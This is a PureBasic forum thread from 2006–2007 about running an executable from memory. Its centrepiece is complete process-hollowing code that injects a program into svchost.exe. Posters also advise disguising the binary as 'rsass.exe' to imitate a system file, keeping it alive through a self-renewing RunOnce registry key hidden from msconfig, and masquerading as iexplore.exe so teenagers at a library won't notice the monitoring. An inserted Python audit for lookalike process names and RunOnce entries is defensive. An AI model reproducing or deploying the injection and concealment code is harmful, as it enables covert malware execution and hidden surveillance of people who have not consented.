Posted: Wed Jun 28, 2006 6:32 pm
by Inf0Byt3
No problem :D

Posted: Sat Jul 15, 2006 9:26 pm
by fsw
Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the German forum there is code to execute a program from memory.

Works pretty well.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.

Posted: Sat Jul 15, 2006 10:20 pm
by Inf0Byt3
Thank you very very much for showing us :!:

Posted: Sun Jul 16, 2006 3:23 pm
by thefool
Interesting!

Posted: Sun Jul 16, 2006 7:15 pm
by ricardo
fsw wrote:Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the German forum there is code to execute a program from memory.

Works pretty well.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.
Interesting!

How to know the path to iexplore.exe? Registry?

Posted: Sun Jul 16, 2006 8:40 pm
by Inf0Byt3
Just run it like this:

RunProgram("iexplore.exe","","")
You don't need a valid path since it is added in the environment path.

Posted: Sun Jul 16, 2006 9:54 pm
by Henrik
@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer) 
Oops, it's Maxus' topic, maybe there should be a new topic for the German code.

Best Henrik

Posted: Sun Jul 16, 2006 11:11 pm
by ricardo
Henrik wrote:@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer) 
Oops, it's Maxus' topic, maybe there should be a new topic for the German code.

Best Henrik
Thanks for your answer.

Yes, the best solution is using iexplore.exe, at least if you want to use this option to create some 'parental control' for surfing.
Kids will not notice that some additional process is running if it shows as iexplore.exe, I guess.

Posted: Sun Jul 16, 2006 11:12 pm
by ricardo
Inf0Byt3 wrote:Just run it like this:

RunProgram("iexplore.exe","","")
You don't need a valid path since it is added in the environment path.
Yes, but it's for the code they showed in the German forum. Really nice code!!

Posted: Mon Jul 17, 2006 9:06 pm
by Henrik
@ricardo Oh, it was something about a school?
Well, is it XP boxes you're running? Then why not use "svchost.exe" instead of iexplore, and use the registry "RunOnce" key.
This I used when you install and you need to reboot the box and run right away when Windows starts again.

When I do this even my ZAPro doesn't complain about the injection.
But the RunOnce gets deleted after the program has run.
Let's say you compiled your program as "rsass.exe" because it sounds like something that could be in the "%systemroot%\System32\" folder, then copy your rsass.exe to ..\windows\System32\rsass.exe
And it will run immediately when Windows starts up, and just before rsass.exe ends it sets a new RunOnce in the registry.

You need of course to run this code once the first time and then reboot your system.

Oh, and another thing: it doesn't show up in "msconfig -> Start" because it was only meant to be used once, but who cares about that :wink:

;// Run an EXE file from RAM!
;// From the German forum:
;// http://www.purebasic.fr/german/viewtopic.php?t=9172&postdays=0&postorder=asc&start=0


Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
Global WinPath.s
Structure IMAGE_SECTION_HEADER
  Name.b[8]
  StructureUnion
    PhysicalAddress.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure


Procedure injectfile(lpProcessname.s, lpBuffer.l)
;Declare
  Structure IMAGE_SECTION_HEADERS
    a.IMAGE_SECTION_HEADER[95]
  EndStructure
 
  Result.l = 0
  Startupinfo.STARTUPINFO
  ProcessInfo.PROCESS_INFORMATION
  Context.CONTEXT
  BaseAddress.l
  lpNumberOfBytesRead.l
  lpNumberOfBytesWritten.w
  *NtHeaders.IMAGE_NT_HEADERS
  *Sections.IMAGE_SECTION_HEADERS
  i.l

;---
Result = #False
ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO))
StartupInfo\cb = SizeOf(STARTUPINFO)
StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
StartupInfo\wShowWindow = #SW_SHOW

If CreateProcess_(lpProcessname,#NUL,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
;If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)

  Context\ContextFlags = #CONTEXT_INTEGER
  GetThreadContext_(ProcessInfo\hThread, Context)
  ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
 
  If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
   
    *adr.IMAGE_DOS_HEADER = lpBuffer
    *NtHeaders = lpBuffer + *adr\e_lfanew
   
    BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
    WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)

    *Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
   
    For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
      WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
    Next
   
    WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
    Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
    Result = SetThreadContext_(ProcessInfo\hThread, Context)
    If Result
      ResumeThread_(ProcessInfo\hThread)
    Else
      TerminateProcess_(ProcessInfo\hProcess, 0)
      CloseHandle_(ProcessInfo\hProcess)
      CloseHandle_(ProcessInfo\hThread)
    EndIf
   
   
  EndIf
EndIf

EndProcedure



WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
If ReadFile(0,WinPath.s+"\System32\notepad.exe")
  buffer = AllocateMemory(Lof(0)) ; read the file into a buffer as usual
  ReadData(0,buffer,Lof(0))
  CloseFile(0)
EndIf

injectfile(WinPath.s+"\System32\svchost.exe",buffer) ; now we run the buffer in the address space of the target process (the original German sample used Paint)

Delay(1000)

If RegCreateKeyEx_(#HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunOnce", 0, 0, #REG_OPTION_NON_VOLATILE, #KEY_ALL_ACCESS, 0, @NewKey, @KeyInfo) = #ERROR_SUCCESS 
  StringBuffer$ = WinPath.s+"\System32\rsass.exe"     ; change Path to a string with the full path to your program!!!
  RegSetValueEx_(NewKey, "TestRsass", 0, #REG_SZ,  StringBuffer$, Len(StringBuffer$)+1)   ; change "Programname" to your individual name
  RegCloseKey_(NewKey) 
EndIf


; Filename.s=Space(1024)
; myFilename=GetModuleFileName_(0,Filename,1024)
; injectfile(Filename,buffer) ; now we run the buffer in the address space of ourselves (a copy)!
Best Henrik
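The post above relies on a file named to resemble a system binary ("rsass.exe" next to lsass.exe) and a RunOnce value that relaunches it. From the defender's side, the cheap check is a lookalike-name audit over the process list and the RunOnce key. The example below is added here and is not code from the thread or from PureBasic; the process list, the RunOnce entries and the list of known binaries are constructed sample data.

```python
# Added example (not from the thread): flag process names that are exactly one edit
# away from a well-known Windows binary, and RunOnce values that launch such a file.
# Sample data is constructed for illustration; a real audit would read the process
# list and HKLM\...\RunOnce from the host.

KNOWN_BINARIES = {"lsass.exe", "svchost.exe", "csrss.exe", "smss.exe",
                  "explorer.exe", "iexplore.exe", "winlogon.exe", "notepad.exe"}

# Constructed process listing: "name|image_path" per line.
SAMPLE_PROCESSES = """\
lsass.exe|C:\\Windows\\System32\\lsass.exe
rsass.exe|C:\\Windows\\System32\\rsass.exe
svchost.exe|C:\\Windows\\System32\\svchost.exe
iexplore.exe|C:\\Program Files\\Internet Explorer\\iexplore.exe
"""

# Constructed RunOnce values: "valuename|command" per line (mirrors the post's TestRsass).
SAMPLE_RUNONCE = """\
TestRsass|C:\\Windows\\System32\\rsass.exe
"""

def edit_distance(a, b):
    # Levenshtein distance by dynamic programming over two rows.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike(name):
    # Return the known binary this name imitates (one edit away), or None if it is
    # itself a known binary or not close to any of them.
    name = name.lower()
    if name in KNOWN_BINARIES:
        return None
    for known in sorted(KNOWN_BINARIES):
        if edit_distance(name, known) == 1:
            return known
    return None

def audit(process_text, runonce_text):
    # Produce one finding per suspicious process name and per RunOnce command.
    findings = []
    for line in process_text.splitlines():
        name, path = line.split("|", 1)
        target = lookalike(name)
        if target:
            findings.append(f"process {name} ({path}) resembles {target}")
    for line in runonce_text.splitlines():
        value, command = line.split("|", 1)
        exe = command.replace("\\", "/").rsplit("/", 1)[-1]
        target = lookalike(exe)
        if target:
            findings.append(f"RunOnce value {value} launches {exe}, resembles {target}")
    return findings
```

Running `audit(SAMPLE_PROCESSES, SAMPLE_RUNONCE)` reports rsass.exe both as a running process and as the RunOnce target, while the genuine lsass.exe, svchost.exe and iexplore.exe entries stay silent.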

Posted: Mon Jul 17, 2006 11:53 pm
by ricardo
Henrik wrote:@ricardo Oh it was something about a school ?
It's about a public library in my town, mainly used by teenagers, and they are damn smart!

That's why I guess if the app is run as iexplore.exe it will be harder for them to notice that there is something unusual running. But I need to find a way to know the path to iexplore.exe because I'm not sure it's always in the same path.

Thanks for your help and comments!! :D

Posted: Mon Jul 24, 2006 6:55 pm
by ricardo
Is it possible to convert this code to PB 3.94?

Posted: Fri Jan 19, 2007 11:40 pm
by stubbsi
You point us to this topic, but the link to download no longer works???

Posted: Fri Jul 20, 2007 10:45 am
by Sanders
Please can someone post a working link to the fshrink package (zip) with source

please

Sanders

Posted: Tue Jul 24, 2007 6:57 am
by Maxus
Look in the first post. The link works.